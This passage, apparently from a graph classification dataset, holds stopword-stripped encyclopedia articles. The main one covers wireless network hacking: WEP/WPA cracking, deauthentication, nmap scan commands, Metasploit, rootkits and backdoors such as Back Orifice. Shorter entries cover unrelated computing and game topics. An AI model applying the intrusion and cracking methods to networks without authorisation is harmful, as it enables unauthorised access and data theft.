sites wireless networks deployed well finding rogue access points laptop analyser released hand-held product impractical reconnaissance wide areas commercial analysers probably offer best combination powerful analysis simple user interface however well adapted needs wardriver free programs androdumpper android apk used test hack wps wireless routers vulnerability using algorithms hack wifi network runs best android version 5.0+ airopeek packet sniffer network traffic analyser made wildpackets commercial program supports windows works wireless network interface cards become industrial standard capturing analysing wireless traffic however like wireshark airopeek requires thorough knowledge protocols use ability kismac program discovery wireless networks runs os x operating system functionality kismac includes gps support mapping ssid decloaking deauthentication attacks wep cracking two basic types vulnerabilities associated wlans caused poor configuration caused poor encryption poor configuration causes many vulnerabilities wireless networks often put use insufficient security settings security settings – default configuration – access obtained simply association without sufficient security settings networks easily defeated cloaking and/or mac address filtering poor encryption causes remaining vulnerabilities wired equivalent privacy wep defective defeated several ways wi-fi protected access wpa cisco lightweight extensible authentication protocol leap vulnerable dictionary attacks wep encryption standard firstly available wireless networks deployed 64 128 bit strength 64 bit wep secret key 40 bits initialisation vector 24 bits often called 40 bit wep 128 bit wep secret key 104 bits initialisation vector 24 bits called 104 bit wep association possible using password ascii key hexadr cracking wep fluhrer mantin shamir attack|fms attack chopping attack fms attack – named fluhrer mantin shamir – based weakness rc4 encryption algorithm researchers found 9000 possible 16 million initialisation vectors considered weak collecting enough allows determination encryption key crack wep key cases 5 million encrypted packets must captured collect 3000 weak initialisation vectors cases 1500 vectors cases 5000 needed success weak initialisation vectors supplied rc4 key-scheduling algorithm ksa |key scheduling algorithm ksa rc4 pseudo-random generation algorithm prga |pseudo random generator prng determine first byte wep key procedure repeated remaining bytes key chopping attack chops last byte captured encrypted packets breaks cyclic redundancy check checksum|integrity check value crc/icv 8 bits removed byte zero crc shortened packet made valid manipulation last four bytes manipulation result original xor certain value manipulated packet retransmitted method enables determination key collecting unique initialisation vectors main problem fms attack chopping attack capturing enough packets take weeks sometimes months fortunately speed capturing packets increased injecting packets network one address resolution protocol arp packets usually collected end transmitted access point repeatedly enough response packets captured arp packets good choice recognizable size 28 bytes waiting legitimate arp packet take awhile arp packets commonly transmitted authentication process rather waiting sending deauthentication frame pushes client network require client reauthenticate often creates arp packet wpa developed vulnerabilities wep wpa uses either pre-shared key wpa-psk used combination radius server wpa-radius encryption algorithm wpa uses either temporal key integrity protocol tkip advanced encryption standard aes wi-fi protected access wpa2|wpa2 developed vulnerabilities wpa-psk strengthen encryption wpa2 uses tkip aes requires encryption piece also authentication piece form extensible authentication protocol eap deployed piece wpa-psk attacked psk shorter 21 characters firstly four-way eap lan eapol handshaking|handshake must captured captured legitimate authentication reauthentication forced sending deauthentication packets clients secondly word word-list must cryptographic hash function|hashed hashed message authentication code – secure hash algorithm 1 two called nonce values along mac address client asked authentication mac address access point gave authentication word-lists found leap uses variation microsoft challenge handshake protocol version 2 ms-chapv2 handshake uses data encryption standard des key selection leap cracked dictionary attack attack involves capturing authentication sequence comparing last two bytes captured response generated word-list wpa-radius cracked however radius authentication server cracked whole network imperilled security authentication servers often neglected wpa2 attacked using wpa-psk attack largely ineffective aircrack-ng runs windows linux crack wep wpa-psk use pychkine-tews-weinmann korek attacks statistical methods efficient traditional fms attack aircrack-ng consists components airmon-ng configures wireless network card airodump-ng captures frames aireplay-ng generates traffic aircrack-ng cracking using data collected airodump-ng finally airdecap-ng decrypts packets captured thus aircrack-ng name suite also one components cowpatty automates dictionary attack wpa-psk runs linux program started using command-line interface specifying word-list contains passphrase dump file contains four-way eapol handshake ssid network void11 program deauthenticates clients runs linux mac address filtering used alone ineffective security measure combination encryption attack determining allowed mac address changing mac address attacker address etherchange one many programs available change mac address network adapters runs windows penetration test ing wireless network often stepping stone penetration testing internal network wireless network serves so-called entry vector wpa-radius use target site another entry vector must investigated 'wireless packet analyzer|sniffer find ip address es helpful network mapping access points usually connect nodes wireless network wired network bridge router bridge router use routing table forward packets finding relevant reachable ip addresses objective reconnaissance phase attacking organization internet relevant ip addresses determined collecting many domain name system|dns host names possible translating ip addresses ip address ranges called footprinting web search engine|search engine key finding much information possible target many cases organizations want protect resources internet access instance web server must accessible many organizations additionally message transfer agent|email servers file transfer protocol|ftp servers systems must accessible internet ip addresses organization often grouped together one ip address found rest probably found around name server store tables show domain names must translated ip addresses vice versa windows command nslookup|nslookup used query dns servers word help entered nslookup prompt list commands given linux command dig used query dns servers displays list options invoked option -h command host reverses ip addresses hostnames program nmap used reverse dns walker nmap -sl 1.1.1.1-30 gives reverse entries given range arin ripe apnic lacnic afrinic five regional internet registry|regional internet registries responsible assignment registration ip addresses website databases searched owner ip address registries respond search name organization list ip address ranges assigned name however records registries always correct cases useless probably computers access internet receive ip address dynamically dynamic host configuration protocol|dhcp protocol become popular last years decrease available ip addresses increase large networks dynamic dhcp particularly important many employees take portable computer one office another router/ firewall computing |firewall device people use home connect internet probably also functions dhcp server nowadays many router/dhcp devices perform network address translation nat nat device gateway telecommunications |gateway local network internet seen internet nat device seems single host nat local network use ip address space ip address ranges reserved private network s. ranges typically used local area network behind nat device 10.0.0.0 10.255.255.255 172.16.0.0 172.31.255.255 192.168.0.0 192.168.255.255 relevant ip addresses must narrowed reachable purpose process scanning enters scene access wireless network gained helpful determine network topology including names computers connected network nmap used available windows linux version however nmap provide user network diagram network scanner network view runs windows program asks one ip address ip address range program finished scanning displays map network using different pictures routers workstation server computing |servers laptop names added direct method finding hosts local area network|lan using program ping networking utility |ping using modern flavour unix shell computing |shell commands combined produce custom ping sweep|ping-sweeps using windows command-line also used create ping-sweep examples given reference ping-sweeps also known host scans nmap used host scan option -sp added nmap -n -sp 10.160.9.1-30 scans first 30 addresses subnet 10.160.9 -n option prevents reverse dns lookups ping packets could reliably determine whether computer line specified ip address nowadays internet control message protocol|icmp echo request packets sometimes blocked firewall operating system although nmap also probes tcp port 80 specifying tcp ports probe recommended pings blocked consequently nmap -sp -ps21,22,23,25,80,139,445,3389 10.160.9.1-30 achieve better results combining various options nmap -sp -ps21,22,23,25,80,135,139,445,1025,3389 -pu53,67,68,69,111,161,445,514 -pe -pp -pm 10.160.9.1-30 superb host scanning achieved nmap available windows unix operating systems offers graphical command-line interfaces purpose port scanning finding open ports computers found host scan port scan started network without making use results host scan much time wasted many ip addresses address range vacant programs communicate internet use either transmission control protocol|tcp user datagram protocol|udp protocol protocols support 65536 called port computer networking |ports programs choose bind allows programs run concurrently one ip address programs default ports often used example http servers commonly use tcp port 80 network scanners try connect tcp udp ports port accepts connection assumed commonly bound program running tcp connections begin syn packet sent client server server responds syn/ack packet finally client sends ack packet scanner sends syn packet gets syn/ack packet back port considered open rst packet received instead port considered closed response received port either considered filtered firewall running host ip address scanning udp ports difficult udp use handshakes programs tend discard udp packets process udp packet sent port program bound icmp error packet returned port considered closed answer received port considered either filtered firewall open many people abandoned udp scanning simple udp scanners distinguish filtered open ports although thorough scan 65536 ports would take time scanning common ports therefore nmap scans 1667 tcp ports default 2007 -p option instructs nmap scan specified ports nmap -p 21-25,80,100-160 10.150.9.46 specifying tcp udp ports also possible nmap -pt:21-25,80 u:5000-5500 10.150.9.46 nmap always requires specification host hosts scan single host specified ip address domain name multiple hosts specified ip address ranges examples 1.1.1.1 www.company.com 10.1.50.1-5,250-254 nmap performs tcp syn scan default scan packets syn flag set -ss option specifies default explicitly nmap started administrator privileges default scan takes effect nmap started user privileges connect scan performed -st option instructs nmap establish full connection scan inferior previous additional packet must sent logging target likely connect scan performed nmap executed user privileges ipv6 addresses scanned -sn option instructs nmap send packets none syn rst ack flags set tcp port closed rst packet sent return tcp port open filtered response null scan often bypass stateless firewall useful stateful firewall employed -su option instructs nmap send udp packets data icmp error returned port assumed closed response received port assumed open filtered differentiation open filtered ports severe limitation -su -sv options instruct nmap use application data application identification combination options lead slow scanning packets sent network faster cope dropped leads inaccurate scanning results intrusion detection system intrusion prevention system present target network detection becomes likely speed increases many intrusion prevention system|ips devices firewalls respond storm syn packets enabling syn cookies make appear every port open full speed scans even wreak havoc stateful firewall|stateful network devices nmap provides five templates adjusting speed also adapts -t0 option makes wait 5 minutes next packet sent -t1 option makes wait 15 seconds -t2 inserts 0.4 seconds -t3 default leaves timing settings unchanged -t4 reduces time-outs retransmissions speed things slightly -t5 reduces time-outs retransmissions even speed things significantly modern ids/ips devices detect scans use -t1 option user also define new template settings use instead provided one -sv option instructs nmap also determine version running application -o option instructs nmap try determine operating systems targets specially crafted packets sent open closed ports responses compared database -ox filename option instructs nmap save output file xml format vulnerability bug application program affects security made public places bugtraq|bugtraq full-disclosure mailing lists computer emergency response team|computer emergency response team cert brings statistical report every year 8064 vulnerabilities counted 2006 alone vulnerability scanning determining whether known vulnerabilities present target exploit computer security |exploit takes advantage software bug|bug application software|application take effect execution arbitrary commands inserting execution path program privilege escalation|escalation privileges bypass authentication infringement confidentiality result metasploit project|metasploit framework released 2003 framework provided first time basic procedure using metasploit choose exploit choose payload set ip address port target start exploit evaluate stop repeat procedure metasploit suited finding vulnerabilities host vulnerability scanner alternatively port scanner found open port exploits port may tried metasploit 3.0 provides following payloads vnc connections need relatively large bandwidth computing |bandwidth usable someone front compromised computer interaction seen quickly command-line interfaces linux os x powerful windows meterpreter payload remedies shortcomings reference gives list meterpreter commands ultimate gratification network intruder always obtain administrator privileges network intruder inside one first undertakings often install so-called rootkit target computer collection programs facilitate durable influence system programs used compromise new user computing user account|user accounts new computers network programs obscure presence intruder obscuring programs may include false versions standard network utilities netstat programs remove data log files computer relate intruder yet programs rootkit may used survey network overhear passwords travelling rootkits may also give means change operating system computer installed network intruder proceeds creating one called backdoor computing |back doors access provisions hard find system administrators serve prevent logging monitoring results normal use network back door may concealed account account privileges escalated may utility remote access telnet configured operate port number customary network intruder proceeds stealing files stealing credit card information preparing computer send spam emails another goal prepare next intrusion cautious intruder protective discovery location method choice use computer already attacked intermediary intruders use series intermediate computers making impracticable locate purpose back door maintain communication channel methods control host gained entry methods include file transfer execution programs often important make sure access communication remains secret access control desirable order prevent others using back door back orifice 2000 designed back door server runs windows client computing |clients windows linux operating systems server configured easily utility configuration server needs uploaded target started back orifice 2000 supports file transfer file execution keystroke logging|logging keystrokes control connections also aes plug-in computing |plug-in traffic encryption stcpio plug-in obfuscation traffic first plug-in adds security combination plug-ins makes much harder ids relate traffic back door information found http //www.bo2k.com rootkits specialize hiding programs hacker defender hxdef open source rootkit windows hide files process windows registry|registry entries port multiple dynamic-link library|dlls although simple command-line interface back door often better use ability hide appropriate tool unprotected wireless network extremely insecure anywhere within broadcast range someone eavesdrop start using network therefore ieee 802.11 standard wireless networks accompanied wired equivalent privacy wep security protocol takes care following wep criticized security experts experts regard ineffective 2004 draft better security protocol appeared included ieee 802.11 standard 2007 new protocol ieee 802.11i-2004|wpa2 uses aes block cipher instead rc4 algorithm better procedures authentication key distribution wpa2 much secure wep wep still wide use 2009 many wireless routers also support controlling mac addresses computers authorized use wireless network measure effectively stop neighbour using network experienced intruders stopped mac filtering attacked mac address faked easily past turning broadcasting ssid also thought give security wireless network case however freely available tools exist quickly discover ssid broadcast microsoft also determined switching broadcasting ssid leads less security details found non-broadcast wireless networks microsoft windows returning encryption wep specification encryption strength unable withstand determined hacking therefore wi-fi protected access wpa derived wep software upgrades often available latest devices conform ieee 802.11g-2003|802.11g ieee 802.11n-2009|802.11n standards also support wpa2 wpa uses tkip encryption wpa2 uses stronger aes method recommended use hardware supports wpa wpa2 installing updates regularly disabling wps setting custom ssid requiring wpa2 using strong password make wireless router difficult crack even unpatched security flaws router software firmware may still used attacker bypass encryption gain control device many router manufacturers always provide security updates timely manner especially inexpensive models wps currently severe vulnerability 8 pin numbered 0-9 passwords used easily split two halves means half brute-forced individually possible combinations greatly lessened 10^4 10^4 opposed 10^8 vulnerability addressed manufacturers days using lock mechanism router automatically lock wps number failed pin attempts take number hours router automatically unlock even rebooted make wps attacks completely obsolete without lock feature wpa2 router wps enabled easily cracked 5 hours using brute force wps attack ssid used routers identify within mass 2.4 3.6 5 60 ghz frequencies currently flying around cities also used seed router password hashes standard popular ssid netgear brute forced use rainbow table however use salt greatly improves security rainbow tables popular method wpa wpa2 cracking obtaining known 4 way handshake device connecting network 4-stage authorization process referred 4 way handshake wireless device undergoes process handshake sent air easily monitored saved external system handshake encrypted router password means opposed communicating router directly quite slow cracker attempt brute force handshake using dictionary attacks device connected directly router still undergo process however handshake sent connected wire opposed air intercepted 4 way handshake already intercepted mean cracker granted immediate access however password used contains least 12 characters consisting random upper lower case letters numbers spell word name pattern password essentially uncrackable give example let take minimum 8 characters wpa2 suppose take upper case lower case letters digits 0-9 small selection symbols avail hefty choice 64 characters 8 character length password grand total 64^8 possible combinations taking single machine could attempt 500 passwords per second gives us 17,900 years attempt every possible combination even mention amount space necessary store combination dictionary note use mac filtering protect network work macs using network easily detected spoofed network scanner sniffer application program makes use wireless network interface card repeatedly tunes wireless card successively number radio channels network detector passive scanning|passive scanner pertains receiver wireless card therefore scanning detected attacker obtain considerable amount information passive scanner information may obtained sending crafted frames provoke useful responses called active scanning probing active scanning also involves use transmitter wireless card activity therefore detected wireless card located detection possible intrusion detection system wireless networks locating possible suitable equipment wireless intrusion detection systems designed detect anomalous behaviour one sensors collect ssids radio channels beacon intervals encryption mac addresses transmission speeds signal-to-noise ratio s. wireless intrusion detection systems maintain registry mac addresses unknown clients detected making use someone else wireless access point wireless router connect internet – without owner consent way – punishable criminal law netherlands true even device uses form access protection penetrate someone else computer without owner consent punishable criminal law though consensus computer attackers divided following groups term hacker originally used someone could modify computer purposes hacking intrusion combined direct alteration security data structures breached system word hacking often confused cracking popular media discourse obfuscates fact hacking less eavesdropping related interference alteration however consistent abuse news media 2007 term hacker commonly used someone accesses network computer without authorization owner 2011 collins english dictionary|collins dictionary stated word hacker mean computer fanatic particular one means personal computer breaks computer system company government like also denoted sense word hacker slang slang words appropriate formal writing speech computer experts reserve word hacker clever programmer call someone breaks computers intruder attacker cracker category computer network security category computer security category cryptographic attacks category data security category dutch law category hacking computer security category local area networks category wi-fi category wireless networking",
    "neighbors": [
      5636,
      6916,
      7556,
      7557,
      6153,
      4490,
      5387,
      6797,
      2446,
      3984,
      2961,
      3473,
      8978,
      1429,
      3094,
      11413,
      794,
      5402,
      7325,
      2084,
      8998,
      9640,
      939,
      10924,
      6013,
      7983,
      2739,
      2996,
      7222,
      823,
      8121,
      5306,
      1083,
      7228,
      5437,
      9791,
      8386,
      4163,
      7364,
      2887,
      842,
      10058,
      10190,
      10329,
      8922,
      4956,
      6364,
      10332,
      479,
      2912,
      225,
      3169,
      9440,
      4580,
      6375,
      11112,
      107,
      9964,
      9968,
      7411,
      5492,
      8692,
      7031,
      1017,
      6779,
      5245,
      1150,
      4863
    ],
    "mask": "Train"
  },
  {
    "node_id": 2431,
    "label": 5,
    "text": "Server_Routing_Protocol:server routing protocol server routing protocol srp proprietary network protocol used transfer data blackberry enterprise server research motion blackberry infrastructure srp communication takes place tcp port 3101 default srp work two different part 1 srp id 2 srp authorization key blackberry enterprise server installation unique server routing protocol identifier srp id srp authentication key must entered srp id srp authentication key register authenticate blackberry enterprise server network work flow like authentication process srp id thought login name authentication key password srp id uniquely identifies blackberry enterprise server network blackberry enterprise server connects blackberry infrastructure must provide two pieces information connect open session blackberry enterprise server connected blackberry infrastructure another server attempts connect using srp id authentication key blackberry infrastructure drops connection blackberry enterprise server creates session newly connecting server multiple concurrent connections made srp id blackberry device attempts send message must include srp id blackberry enterprise server note service book menu blackberry device open desktop cmime service book specified unique identifier uid value srp id blackberry enterprise server blackberry device attempts send messages blackberry device sends message arrives blackberry infrastructure message contains srp id pulled service book uid value blackberry infrastructure uses information send message corresponding blackberry enterprise server decryption processing ref blackberry server trial mentioning technology",
    "neighbors": [
      6403,
      9860,
      9987,
      1030,
      3847,
      9992,
      6544,
      3218,
      8211,
      11413,
      5270,
      6681,
      5402,
      5021,
      3742,
      2206,
      2208,
      5405,
      10271,
      1955,
      10274,
      9381,
      10924,
      562,
      2996,
      9909,
      7478,
      7865,
      4797,
      3006,
      3133,
      4543,
      5437,
      5439,
      7360,
      7364,
      11332,
      2887,
      8265,
      2509,
      4691,
      5469,
      5470,
      5472,
      1893,
      10344,
      11112,
      3949,
      8432,
      5118
    ],
    "mask": "Train"
  },
  {
    "node_id": 2432,
    "label": 6,
    "text": "Computer_file:computer file computer file computer resource recording data discretely computer storage device words written paper information written computer file files edited transferred internet particular computer system different types computer files designed different purposes file may designed store picture written message video computer program wide variety kinds data types files store several types information using computer programs person open read change save close computer file computer files may reopened modified copied arbitrary number times typically files organised file system keeps track files located disk enables user access word file derives latin filum thread file used context computer storage early january 1940 punched card methods scientific computation w.j eckert stated first extensive use early hollerith tabulator astronomy made comrie used building table successive differences adding large numbers harmonic terms tables functions constructed differences great efficiency either printed tables file punched cards february 1950 radio corporation america rca advertisement popular science magazine describing new memory vacuum tube developed rca stated results countless computations kept 'on file taken 'file exists 'memory tube developed rca laboratories electronically retains figures fed calculating machines holds storage memorizes new ones speeds intelligent solutions mazes mathematics 1952 file denoted inter alia information stored punched cards early use underlying hardware rather contents stored denominated file example ibm 350 disk drives denominated disk files introduction circa 1961 burroughs mcp mit compatible time-sharing system concept file system managed several virtual files one storage device origin contemporary denotation word although contemporary register file demonstrates early concept files use greatly decreased modern operating systems files organized one-dimensional arrays bytes format file defined content since file solely container data although platforms format usually indicated filename extension specifying rules bytes must organized interpreted meaningfully example bytes plain text file windows associated either ascii utf-8 characters bytes image video audio files interpreted otherwise file types also allocate bytes metadata allows file carry basic information file systems store arbitrary interpreted file system file-specific data outside file format linked file example extended attributes forks file systems done via sidecar files software-specific databases methods however susceptible loss metadata container archive file formats instant time file might size normally expressed number bytes indicates much storage associated file modern operating systems size non-negative whole number bytes system limit many older operating systems kept track number blocks tracks occupied file physical storage device systems software employed methods track exact byte count e.g. cp/m used special control character ctrl-z signal end text files general definition file require size real meaning however unless data within file happens correspond data within pool persistent storage special case zero byte file files newly created files yet data written may serve kind flag file system accidents results aborted disk operations example file link points typical unix-like system probably defined size seldom changes compare also file size may obscure information computer file consist smaller packets information often called records lines individually different share common traits example payroll file might contain information concerning employees company payroll details record payroll file concerns one employee records common trait related payroll—this similar placing payroll information specific filing cabinet office computer text file may contain lines text corresponding printed lines piece paper alternatively file may contain arbitrary binary image blob may contain executable way information grouped file entirely designed led plethora less standardized file structures imaginable purposes simplest complex computer files used computer programs create modify delete files use as-needed basis programmers create programs decide files needed used often names cases computer programs manipulate files made visible computer user example word-processing program user manipulates document files user personally names although content document file arranged format word-processing program understands user able choose name location file provide bulk information words text stored file many applications pack data files single file called archive file using internal markers discern different types information contained within benefits archive file lower number files easier transfer reduce storage usage organize outdated files archive file must often unpacked next using basic operations programs perform file files computer created moved modified grown shrunk deleted cases computer programs executed computer handle operations user computer also manipulate files necessary instance microsoft word files normally created modified microsoft word program response user commands user also move rename delete files directly using file manager program windows explorer windows computers command lines cli unix-like systems user space programs operate directly low level file kernel deals files handles user-space interaction files manner transparent user-space programs operating system provides level abstraction means interaction file user-space simply filename instead file descriptor example rm filename delete file link file many links file removed kernel considers file memory space free reallocated free space commonly considered security risk due existence file recovery software secure-deletion program uses kernel-space system functions wipe file data modern computer systems files typically accessed using names filenames operating systems name associated file others file anonymous pointed links names latter case user identify name link file false analogue especially exists one link file files links files located directories however generally directory contain either list files list links files within definition paramount importance term file includes directories permits existence directory hierarchies i.e. directories containing sub-directories name refers file within directory must typically unique words must identical names within directory however operating systems name may include specification type means directory contain identical name one type object directory file environments file named file name path file directory must uniquely identify among files computer system—no two files name path file anonymous named references exist within namespace cases name within namespace refer exactly zero one file however file may represented within namespace zero one names string characters may well-formed name file link depending upon context application whether name well-formed depends type computer system used early computers permitted letters digits name file modern computers allow long names 255 characters containing almost combination unicode letters unicode digits making easier understand purpose file glance computer systems allow file names contain spaces others case-sensitivity file names determined file system unix file systems usually case sensitive allow user-level applications create files whose names differ case characters microsoft windows supports multiple file systems different policies regarding case-sensitivity common fat file system multiple files whose names differ case user uses disk editor edit file names directory entries user applications however usually allow user create multiple files name differing case computers organize files hierarchies using folders directories catalogs concept irrespective terminology used folder contain arbitrary number files also contain folders folders referred subfolders subfolders contain still files folders thus building tree-like structure one master folder root folder — name varies one operating system another contain number levels folders files folders named files except root folder often name use folders makes easier organize files logical way computer allows use folders file folder name also path identifies folder folders file folder resides path sort special character—such slash—is used separate file folder names example illustration shown article path uniquely identifies file called folder called turn contained folder called folder file names separated slashes example topmost root folder name path begins slash root folder name would precede first slash many computer systems use extensions file names help identify contain also known file type windows computers extensions consist dot period end file name followed letters identify type file extension identifies text file extension identifies type document documentation commonly microsoft word file format even extensions used computer system degree computer system recognizes heeds vary systems required systems completely ignored presented many modern computer systems provide methods protecting files accidental deliberate damage computers allow multiple users implement file permissions control may may modify delete create files folders example given user may granted permission read file folder modify delete user may given permission read modify files folders execute permissions may also used allow certain users see contents file folder permissions protect unauthorized tampering destruction information files keep private information confidential unauthorized users another protection mechanism implemented many computers read-only flag flag turned file accomplished computer program human user file examined modified flag useful critical information must modified erased special files used internal parts computer system systems also include hidden flag make certain files invisible flag used computer system hide essential system files users alter file useful purpose must physical manifestation file abstract concept real computer system must real physical analogue exist physical terms computer files stored type data storage device example operating systems store files hard disk hard disks ubiquitous form non-volatile storage since early 1960s files contain temporary information may stored ram computer files also stored media cases magnetic tapes compact discs digital versatile discs zip drives usb flash drives etc use solid state drives also beginning rival hard disk drive unix-like operating systems many files associated physical storage device examples files directories virtual files exist objects within operating system kernel seen running user program files usually represented either file control block file handle file control block fcb area memory manipulated establish filename etc passed operating system parameter used older ibm operating systems early pc operating systems including cp/m early versions ms-dos file handle generally either opaque data type integer introduced around 1961 algol-based burroughs mcp running burroughs b5000 ubiquitous file said corrupted contents saved computer way ca n't properly read either human software depending extension damage original file sometimes recovered least partially understood file may created corrupt may corrupted later point overwriting many ways file become corrupted commonly issue happens process writing file disk example image-editing program unexpectedly crashes saving image file may corrupted program could n't save entirety program might warn user error allowing another attempt saving file examples reasons files become corrupted include although file corruption usually happens accidentally may also done purpose fool someone else thinking assignment ready earlier date potentially gaining time finish said assignment services provide demand file corruption essentially fill given file random data ca n't opened read yet still seems legitimate one effective countermeasures file corruption backing important files event important file becoming corrupted user simply replace backed version computer files contain information extremely important back-up process used protect disasters might destroy files backing files simply means making copies files separate location restored something happens computer deleted accidentally many ways back files computer systems provide utility programs assist back-up process become time-consuming many files safeguard files often copied removable media writable cds cartridge tapes copying files another hard disk computer protects failure one disk necessary protect failure destruction entire computer copies files must made media taken away computer stored safe distant location grandfather-father-son backup method automatically makes three back-ups grandfather file oldest copy file son current copy way computer organizes names stores manipulates files globally referred file system computers least one file system computers allow use several different file systems instance newer ms windows computers older fat-type file systems ms-dos old versions windows supported addition ntfs file system normal file system recent versions windows system advantages disadvantages standard fat allows eight-character file names plus three-character extension spaces example whereas ntfs allows much longer names contain spaces call file ntfs fat would restricted something like unless using vfat fat extension allowing long file names file manager programs utility programs allow users manipulate files directly allow move create delete rename files folders although actually allow read contents file store information every computer system provides least one file-manager program native file system example file explorer formerly windows explorer commonly used microsoft windows operating systems nautilus common several distributions linux",
    "neighbors": [
      9216,
      3081,
      3598,
      7189,
      8214,
      8729,
      11293,
      9762,
      2597,
      5158,
      6694,
      2095,
      1073,
      1586,
      8754,
      52,
      1593,
      7739,
      3137,
      8772,
      1610,
      5706,
      10314,
      10828,
      4174,
      5202,
      5714,
      1109,
      2138,
      2140,
      1118,
      1631,
      10340,
      3175,
      8298,
      8301,
      9840,
      4721,
      6770,
      6772,
      119,
      7290,
      1659,
      2687,
      7297,
      9345,
      7818,
      10378,
      6797,
      8847,
      9872,
      2193,
      2194,
      3729,
      8340,
      2197,
      2198,
      7318,
      9874,
      11416,
      4763,
      6812,
      6813,
      3744,
      10916,
      1193,
      8876,
      9388,
      2222,
      8879,
      692,
      7364,
      9926,
      4298,
      1741,
      719,
      722,
      8402,
      8914,
      4309,
      2262,
      6358,
      7893,
      4320,
      225,
      6372,
      237,
      10989,
      242,
      3314,
      3315,
      5363,
      9972,
      6396,
      2304,
      3841,
      3330,
      1801,
      1803,
      5904,
      2322,
      5397,
      6935,
      1304,
      8988,
      10016,
      2338,
      6946,
      7461,
      3366,
      3368,
      302,
      4398,
      7983,
      10033,
      1842,
      11568,
      1332,
      1844,
      9527,
      11256,
      4409,
      8509,
      9533,
      3393,
      5953,
      3909,
      10568,
      8524,
      5454,
      5969,
      2389,
      9557,
      5975,
      6487,
      2907,
      6494,
      8032,
      7522,
      3428,
      5482,
      8554,
      9075,
      7540,
      2933,
      1915,
      1412,
      3462,
      4490,
      5514,
      2959,
      11667,
      9620,
      2456,
      1951,
      11683,
      5029,
      6565,
      5546,
      2477,
      2479,
      7088,
      11695,
      11187,
      950,
      8640,
      10176,
      3522,
      451,
      964,
      1475,
      1988,
      2501,
      3525,
      969,
      9166,
      984,
      4064,
      9188,
      1509,
      2534,
      6120,
      3562,
      4589,
      6126,
      7663,
      10737,
      3571,
      5619,
      9204,
      11251,
      7160,
      4601,
      3582,
      10751
    ],
    "mask": "Test"
  },
  {
    "node_id": 2433,
    "label": 7,
    "text": "AppFolio:appfolio appfolio founded 2006 offers software-as-a-service saas applications vertical markets appfolio initially focused property management software acquisition mycase 2012 expanded law practice management industry company ’ headquarters goleta california united states also offices san diego california dallas texas appfolio established 2006 co-founders klaus schauser jon walker schauser previously founded expertcity company ’ first focus property management small-to-medium businesses first product appfolio property manager launched 2007 november 2012 appfolio acquired mycase legal practice management software provider appfolio purchased real estate software firm rentlinx april 2015 acquisition included rights website showmetherent.com expanded sphere appfolio ’ clients provided greater listing presence may 2015 appfolio announced ipo unveiled june raised 74 million 2019 appfolio acquired dynasty marketplace inc. leading provider advanced artificial intelligence ai solutions real estate market 2019 2018 2017 2016 2015 2014",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 2434,
    "label": 3,
    "text": "Aliens:_The_Computer_Game_(1987_video_game):aliens computer game 1987 video game aliens computer game also known aliens video game developed software studios published electric dreams software 1987 initially amstrad cpc commodore 64 zx spectrum based film title ports commodore 16 msx developed mr. micro published 1987 aliens computer game played first-person perspective set inside atmosphere processing plant maze complex consisting 255 rooms player encounters alien enemies throughout game upon killing alien body leaves deadly pool acid blood must avoided player also faces threat bio-mechanical growth left uncontained results new alien eggs facehugger enemies player ultimate goal reach room houses queen alien nests must destroyed player directly control team marine soldiers issue orders team mobile tactical operations bay mtob playing mtob player view team surroundings via video cameras attached soldier helmet according retro gamer game praised computing press zzap amstrad action sinclair user awarded 81 90 5/5 respectively crash gave score 84 one reviewer declaring best game-of-the-film date review zzap 64 also opined best tie-in game date good game boot computer gamer gave excellent game superb film overall score 80 commodore user gave 8 10 sinclair gave 9 10 1993 commodore force ranked game number 59 list top 100 commodore 64 games retro gamer retrospective darren jones opined despite incredible basic look aliens dripped atmosphere quite unlike movie conversion time bloody good first-person view used game perfectly matched moment film pumped-up marines start exploring deserted base game progressed managed capture terror confusion movie way titles managed magazine also declared scariest 8-bit game ever made stephen kleckner gamesbeat wrote may lack audio/visual punch gameplay tightly defined forward-thinking time also recommended windows fan remake aliens titled lv-426",
    "neighbors": [
      2997,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 2435,
    "label": 3,
    "text": "Computer_architecture_simulator:computer architecture simulator computer architecture simulator program simulates execution computer architecture computer architecture simulators used following purposes computer architecture simulators classified many different categories depending context full-system simulator execution-driven architecture simulation level detail complete software stacks real systems run simulator without modification full system simulator provides virtual hardware independent nature host computer full-system model typically includes processor cores peripheral devices memories interconnection buses network connections emulators full system simulators imitate obsolete hardware instead development hardware defining property full-system simulation compared instruction set simulator model allows real device drivers operating systems run single programs thus full-system simulation makes possible simulate individual computers networked computer nodes software network device drivers operating systems network stacks middleware servers application programs full system simulation speed system development process making easier detect recreate repair flaws use multi-core processors driving need full system simulation extremely difficult time-consuming recreate debug errors without controlled environment provided virtual hardware also allows software development take place hardware ready thus helping validate design decisions cycle-accurate simulator computer program simulates microarchitecture cycle-by-cycle basis contrast instruction set simulator simulates instruction set architecture usually faster cycle-accurate specific implementation architecture often used emulating older hardware time precisions important legacy reasons often cycle-accurate simulator used designing new microprocessorsthey tested benchmarked accurately including running full operating system compilers without actually building physical chip easily change design many times meet expected plan cycle-accurate simulators must ensure operations executed proper virtual real possible timebranch prediction cache misses fetches pipeline stalls thread context switching many subtle aspects microprocessors",
    "neighbors": [
      2435,
      5381,
      9932,
      5358,
      398,
      7983,
      10675,
      8122,
      3421
    ],
    "mask": "Test"
  },
  {
    "node_id": 2436,
    "label": 3,
    "text": "Time_Gal:time gal time gal interactive movie video game developed published taito malone films originally released japan arcades 1985 action game uses full motion video fmv display on-screen action player must correctly choose on-screen character actions progress story pre-recorded animation game produced toei animation game set fictional future time travel possible protagonist reika travels different time periods search criminal luda time successfully tracking luda reika prevents plans alter past time gal inspired success earlier laserdisc video games notably 1983 title dragon lair also used pre-recorded animation game later ported sega cd worldwide release also laseractive japan home console versions received mixed reception time gal fmv-based game uses pre-recorded animation rather sprites display on-screen action gameplay divided levels referred time periods game begins 4001 ad theft time travel device thief luda steals device take world changing history reika protagonist also known time gal uses time travel device pursue travels different time periods 70,000,000 bc 44 bc 1588 ad 2010 ad search luda time period scenario presents series threats must avoided confronted successfully navigating sequences allows player progress another period player uses joystick button input commands though home versions use game controller directional pad game progresses visual cues—highlighted portions background foreground—will appear screen help survive dangers occur throughout stage difficult settings omit visual cues depending location cue player input one four directions left right attack shoot target laser gun inputting correct command either avoid neutralize threats progress game incorrect choices result character death reika dying many times results game specific moments game involve reika stopping time moments players presented list three options seven seconds choose one save character game uses laserdisc technology stream pre-recorded animation produced japanese studio toei animation game features raster graphics crt monitor amplified monaural sound reika physical appearance possibly derived either lum urusei yatsura yuri dirty pair several factors prevented 